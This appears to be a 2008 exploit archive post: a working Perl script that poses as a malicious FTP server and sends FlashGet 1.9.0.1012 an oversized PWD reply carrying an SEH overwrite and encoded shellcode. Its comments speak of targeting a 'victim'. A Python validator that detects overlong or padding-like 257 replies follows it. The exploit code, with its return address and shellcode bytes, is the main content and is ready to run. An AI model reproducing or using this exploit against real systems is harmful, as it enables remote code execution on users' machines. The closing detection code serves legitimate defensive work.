
flashget190-overflow.txt

Posted Aug 16, 2008
Authored by skOd

FlashGet version 1.9.0.1012 FTP PWD Response SEH stack overflow exploit.

tags | exploit, overflow
SHA-256 | 0999f84090712d0d9b6a50064b2335063f19efb2bba617ce908e6a3735abfd8b

#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.

##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240

##
# special thanks to a friend of mine who helped me

use IO::Socket;

####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# The host that will listen for the download request coming from FlashGet
my $HOST = '127.0.0.1'; # your own IP address
#################################[Don't Edit From Here]#####################################


######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;

# Execution returns to the next-SEH field, so it holds a short jump followed by
# an invalid address; the invalid pointer makes it the last record in the chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6

# Return address (overwrites the current SEH handler pointer)
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN

# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
$CUR_SEH_ADDRESS;

#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300; # Append a large NOP block so that writing past the end of the stack
                          # raises an exception, which causes our handler to be called

$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";

my $serverSocket = new IO::Socket::INET (Listen => 1,
LocalAddr => $HOST,
LocalPort => $LISTEN_PORT,
Proto => 'tcp');
do
{
print "\r\n[~] listening...\r\n";
$clientSocket = $serverSocket->accept();
print "[+] New Connection Received\r\n";

$clientSocket->send("220 WELCOME!\r\n");
$isPayloadSent = 0;

while($isPayloadSent == 0) {
$clientSocket->recv($recvBuffer,1024);
print "[~] Received: " . $recvBuffer;

if($recvBuffer =~ /USER/) {
$clientSocket->send("331 Password required for l33t\r\n");
} elsif($recvBuffer =~ /PASS/) {
$clientSocket->send("230 User l33t logged in.\r\n");
} else {
$clientSocket->send("257 \"$PAYLOAD\"\r\n");
print("[+] The payload has been sent...\r\n");
$isPayloadSent = 1;
}
}

$clientSocket->close();

} while (1);
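The weakness this exploit abuses is a client that copies the quoted pathname of an FTP 257 reply into a fixed-size stack buffer without bounding its length. The following Python is an added example, not part of the Packet Storm post or FlashGet's code, showing the kind of validation a hardened client or an inspecting proxy should apply to a PWD reply before trusting it: parse the reply per RFC 959, reject pathnames longer than a fixed limit (MAX_PATH, 260, is assumed here as a reasonable bound), flag non-printable bytes, and flag long runs of a single repeated byte, which is characteristic of overflow padding rather than a real directory name. The sample replies are constructed inline; only the reply structure is taken from the page.

```python
import re

MAX_PATH_LEN = 260                        # assumed bound; Windows MAX_PATH
PRINTABLE = set(range(0x20, 0x7F))        # printable 7-bit ASCII

# Single-line FTP reply: three-digit code, space (final) or '-' (multi-line), text.
_REPLY_RE = re.compile(rb"^(\d{3})([ -])(.*)$", re.DOTALL)


def parse_ftp_reply(raw: bytes):
    """Return (code, text) for a single-line reply, or None if malformed."""
    line = raw.rstrip(b"\r\n")
    m = _REPLY_RE.match(line)
    if not m:
        return None
    return int(m.group(1)), m.group(3)


def extract_quoted_path(text: bytes):
    """RFC 959: a 257 reply quotes the pathname; a doubled quote is a literal quote.
    Returns the pathname, or None if the quoting is not well formed."""
    if not text.startswith(b'"'):
        return None
    out = bytearray()
    i = 1
    while i < len(text):
        if text[i:i + 1] == b'"':
            if text[i + 1:i + 2] == b'"':        # escaped quote inside the name
                out += b'"'
                i += 2
                continue
            return bytes(out)                    # closing quote found
        out += text[i:i + 1]
        i += 1
    return None                                  # unterminated quote


def audit_pwd_reply(raw: bytes, max_len: int = MAX_PATH_LEN):
    """Return a list of findings for a 257 (PWD) reply; empty means it looks benign."""
    findings = []
    parsed = parse_ftp_reply(raw)
    if parsed is None:
        return ["malformed reply line"]
    code, text = parsed
    if code != 257:
        return findings                          # only PWD-style replies are audited
    path = extract_quoted_path(text)
    if path is None:
        findings.append("257 reply without a well-formed quoted pathname")
        path = text                              # audit the raw text instead
    if len(path) > max_len:
        findings.append(f"pathname length {len(path)} exceeds {max_len}")
    non_printable = sum(1 for b in path if b not in PRINTABLE)
    if non_printable:
        findings.append(f"{non_printable} non-printable bytes in pathname")
    # 32 or more copies of one byte in a row is padding, not a directory name.
    if re.search(rb"(.)\1{31,}", path, re.DOTALL):
        findings.append("long repeated-byte run (padding-like)")
    return findings


# Constructed sample replies (not captured traffic).
BENIGN_REPLY = b'257 "/home/user" is current directory.\r\n'
OVERSIZED_REPLY = b'257 "' + b"A" * 400 + b"\x90" * 50 + b'"\r\n'
UNTERMINATED_REPLY = b'257 "/tmp\r\n'
OTHER_REPLY = b"230 User l33t logged in.\r\n"


def audit_samples():
    """Map each constructed sample to its findings."""
    return {
        "benign": audit_pwd_reply(BENIGN_REPLY),
        "oversized": audit_pwd_reply(OVERSIZED_REPLY),
        "unterminated": audit_pwd_reply(UNTERMINATED_REPLY),
        "other": audit_pwd_reply(OTHER_REPLY),
    }


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(f"{name}: {findings or 'ok'}")
```

A client that applies this check before copying the pathname would refuse the oversized reply outright; a proxy or IDS can apply the same rules to the control channel and alert on the length and repeated-byte findings, which do not depend on recognising any particular payload.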

